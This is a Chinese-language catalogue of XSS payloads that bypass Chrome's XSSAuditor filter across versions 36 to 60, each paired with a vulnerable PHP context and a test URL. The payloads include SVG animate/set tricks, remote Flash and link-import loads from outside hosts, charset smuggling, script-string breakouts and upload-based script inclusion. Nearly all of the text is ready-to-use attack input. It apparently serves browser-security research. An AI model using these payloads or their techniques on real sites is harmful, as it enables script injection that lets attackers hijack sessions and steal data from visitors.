作者:phith0n@長亭科技
Universal Bypass 5
最新版 Chrome 60
context == null
test:
http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
Bypass 4 (需交互的bypass)
chrome 60
?c=<svg><animate href=#x attributeName=href values= javascript:alert(1) /><a id=x><rect width=100 height=100 /></a> // or ?c=<svg width=10000px height=10000px><a><rect width=10000px height=10000px z-index=9999999 /><animate attributeName=href values=javascript:alert(1)>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Canimate%20href%3D%23x%20attributeName%3Dhref%20values%3D%26%23x3000%3Bjavascript%3Aalert%281%29%20%2F%3E%3Ca%20id%3Dx%3E%3Crect%20width%3D100%20height%3D100%20%2F%3E%3C%2Fa%3E http://mhz.pw/game/xss/xss.php?xss=%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E
Bypass 3 via flash
只要支持flash的chrome版本(到Chrome 56),均可使用。
context == support flash
<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf>
test
http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf%3E
Universal Bypass 2
到Chrome 55/56可用, 無任何條件,只要輸出在頁面中即可執行代碼。
context == null
?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href%3D%23script%20attributeName%3Dhref%20to%3Ddata%3A%2Calert(document.domain)%20%2F%3E%3Cscript%20id%3Dscript%20src%3Dfoo%3E%3C%2Fscript%3E
Universal Bypass 1
到Chrome 55/56可用,無任何條件,只要輸出在頁面中即可執行代碼。
context == null
?xss=<link rel="import" href="https:www.leavesongs.com/testxss"
test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3D%22import%22%20href%3D%22https%3Awww.leavesongs.com%2Ftestxss%22
Chrome 59 && 輸出點後面有空格的情況
context:
<?php header('X-XSS-Protection: 1; mode=block'); echo "<!DOCTYPE html><html><head></head><body>{$_GET['html']} </body></html>";
test
http://mhz.pw/game/xss/xss2.php?html=%3Cscript%3Ealert%28%29%3C/script
Chrome 44/45 + 屬性中輸出的情況
https://code.google.com/p/chromium/issues/detail?id=526104
chrome45+ fixed
context:
<html> <head> <title>XSSAuditor bypass</title> </head> <body> <form> <input type="text" value="<?php echo isset($_GET['input']) ? $_GET['input'] : 'use ?input=foo'?>"> </form> </body> </html>
payload:
"><script>prompt(/XSS/);1%02<script</script>
test
http://mhz.pw/game/xss/attr.php?xss=%22%3E%3Cscript%3Eprompt(%2FXSS%2F)%3B1%2502%3Cscript%3C%2Fscript%3E
無charset Bypass
沒有輸出charset的情況下,可以通過制定字符集來繞過auditor。
老版的這個編碼:ISO-2022-KR,可用 onerror%0f=alert(1)
bypass,但現在版本已經沒用這個編碼,所以該payload只適用於老版本chrome。
新版中,有這個編碼:ISO-2022-JP,可以在關鍵處中加入 %1B%28B
,會被省略。
context:
<?php echo $_GET['xss'];
payload:
老版: xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%0f=alert(1)%3E 新版: xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
test:
http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
輸出在屬性中,並且後面還有<script>
的情況
context:
<!doctype HTML> <img alt="<?php echo $_GET['xss']; ?>"> <script> y = "abc"; </script>
payload
<code>xss="><script/src=data:,alert(1)%2b" xss=%22%3E%3Cscript/src=data:,alert(document.domain)%2b%22 xss=%22%3E%3Cscript/src=data:,alert(1)%2b%22 xss=%22%3E%3Cscript/src=data:,alert(1)%26sol;%26sol;</code>
test
http://mhz.pw/game/xss/beforescript.php?xss=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(document.domain)%2B%22
雙輸出點的情況
context:
<?php // Echo the value of parameter one echo "This is text1:".$_GET['text1']."<br><br>"; // Echo the value of parameter two echo "This is text2:".$_GET['text2']."<br><br>"; ?>
payload:
http://xxx/chrome.php?text1=<script>alert(/XSS/);void('&text2=')</script> http://xxx/chrome.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>
test
http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E
Chrome 43 XSSAuditor bypass
大概2015-06-23以前的版本均可。
context==全部情況
payload:
xss=<svg><script>/<1/>alert(document.domain)</script></svg>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E
Chrome 36~40 link 導入html導致bypass
Fixed in Oct 10, 2014.(實際上15年初還存在)
https://code.google.com/p/chromium/issues/detail?id=421166 http://www.wooyun.org/bugs/wooyun-2010-090304
由於link導入外部html導致XSSAuditor繞過。
context==全部情況
payload
xss=<link rel=import href=https://auth.mhz.pw/game/xss/link.php>
test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3Dimport%20href%3Dhttps%3A%2F%2Fauth.mhz.pw%2Fgame%2Fxss%2Flink.php%3E
輸出在script內字符串位置的情況
如果允許閉合字符串,直接閉合併寫入javascript即可,如: http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
但如果不能閉合單引號呢?如這個context
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>all</title> <script type="text/javascript"> var a = '<?php echo addslashes($_GET["xss"]); ?>'; </script> </head> <body> 123 </body> </html>
payload
<script> x = "</script><svg><script>alert(1)+""; <script> x = "</script><svg><script>alert(1)+'";
test
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2b%26apos%3B http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//
有可控上傳點的通用Bypass
context:
網站域名下有可控的上傳點,我可以上傳一個.txt或.js等文件(只要不是媒體文件,其他文件均可,比如上傳是黑名單驗證的,可以隨便寫個後綴)。再引入script標籤的src屬性即可。
payload
xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
test
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E
JSON Encode
context
<?=json_encode($_GET['x'])?>
payload
?x=<img+src=x+onerror=`ö`-alert(1)>
存在字符替換的情況
當輸出點在輸出前存在字符(大部分字符,字符串什麼的都可以)的替換,context如下:
<?php echo str_replace('"', '"e;', $_REQUEST['name']); echo str_replace('&', '&', $_REQUEST['name']); echo str_replace('//', '\', $_REQUEST['name']); echo str_replace('#', '#', $_REQUEST['name']); echo str_replace('xxxx', 'b', $_REQUEST['name']);
既可以在payload裡帶入該字符進行繞過auditor:
xss=<script>'"'/alert(1)</script>
test
http://mhz.pw/game/xss/amps.php?name=zx%3Cscript%3E%27%26%27/alert(1)%3C/script%3Eczxc